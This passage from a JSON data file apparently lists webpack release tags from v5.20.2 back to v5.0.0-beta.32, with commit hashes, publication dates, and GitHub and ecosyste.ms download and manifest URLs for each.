5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,